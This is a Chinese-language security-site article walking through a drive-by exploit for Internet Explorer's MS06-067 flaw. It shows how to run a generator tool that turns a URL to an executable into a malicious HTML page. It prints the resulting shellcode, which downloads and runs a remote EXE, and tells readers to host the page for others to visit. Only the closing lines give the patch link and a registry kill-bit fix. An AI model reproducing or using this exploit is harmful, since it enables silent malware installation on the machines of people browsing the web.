设 为 首 页
加 入 收 藏
联 系 我 们
推荐栏目 | Sniffer | Ethereal | IPV6 | IPTV | MPLS | TCP/IP | SNMP | WLAN | 中文RFC文档 | 编码交流 |
   

您现在的位置: 首页>>网络安全>>病毒防范>>正文

令人汗颜的IE最新漏洞(MS06-067)测试

这个漏洞太恐怖了,恐怖的让我不敢写出来,考虑到马上网上这样的工具都会泛滥,还是提前告诉大家比较好,我不详细的利用过程,如果你接触过类似的,肯定是会使用的,再次奉劝大家,测试为主,不要乱挂马,危害他人!受影响的系统:Microsoft Windows 2000 Service Pack 4Microsoft Windows XP Service Pack 2Microsoft Windows XP Professional x64 EditionMicrosoft Windows Server 2003Microsoft Windows Server 2003 Service Pack 1Microsoft Windows Server 2003(用于基于 Itanium 的系统)Microsoft Windows Server 2003 SP1(用于基于 Itanium 的系统)Microsoft Windows Server 2003 x64 Edition受影响软件:Microsoft Internet Explorer 6.0 SP1Microsoft Internet Explorer 6.0Microsoft Internet Explorer 5.0.1 SP4不受影响软件:Internet Explorer 7利用过程如下,1、首先把一个你需要运行的EXE文件放在网上,得到地址: http://www.1steam.cn/tools/jhzj.exe(我这里测试用的是按钮突破专家)。2、接着看下这个生成工具(LION提供的,谢)的使用方法:Usage: e:/ms_exp/06067/ms06067.exe [htmlfile]--就是你的EXE的路径,如我这里的“按钮突破专家”的地址:[htmlfile]--需要生成的HTML文件的名称,如我这里的1st.html3、生成过程,按照上面的格式就可以生成了,过程如下:

E:\Ms_exp\06067>ms06067 http://www.1steam.cn/tools/jhzj.exe 1st.html[+] download url:http://www.1steam.cn/tools/jhzj.exe[+] exploit file:1st.html"%ua3e9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c""%u1c70%u8bad%u0868%uf78b%u046a%ue859%u0043%u0000""%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u9516""%u2ee8%u0000%u8300%u20ec%udc8b%u206a%uff53%u0456""%u04c7%u5c03%u2e61%uc765%u0344%u7804%u0065%u3300""%u50c0%u5350%u5057%u56ff%u8b10%u50dc%uff53%u0856""%u56ff%u510c%u8b56%u3c75%u748b%u782e%uf503%u8b56""%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be""%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775""%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd""%u8b04%uc503%u5eab%uc359%u58e8%uffff%u8eff%u0e4e""%uc1ec%ue579%u98b8%u8afe%uef0e%ue0ce%u3660%u2f1a""%u6870%u7474%u3a70%u2f2f%u7777%u2e77%u7331%u6574""%u6d61%u632e%u2f6e%u6f74%u6c6f%u2f73%u686a%u6a7a""%u652e%u6578%u0000";[+] exploit write to 1st.html success!
看到这句:[+] exploit write to 1st.html success!就说明成功了。可以去ms06067.exe的目录下,看到生成的HTML文件1st.html。4、把这个HTML文件放在网上,给人家访问就可以了,我这里的这个测试网页地址在:http://www.1steam.cn/modiy/1st.html ,你可以打开看看效果,如果你能看到运行的“按钮突破专家”,说明成功。5、修补官方已经除了补丁,地址在:http://www.microsoft.co.ke/china ... letin/MS06-067.mspx。或者修补如下(LION提供的,再谢):请将以下文本粘贴于记事本等文本编辑器中。然后,使用.reg文件扩展名保存文件:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}]"Compatibility Flags"=dword:00000400

 


版权所有 中国协议分析网 联系信箱:wayky#126.com(请把"#"改成"@")
Copyright (C) www.Cnpaf.Net 2004-2008  All Rights Reserved. [京ICP备05002225号]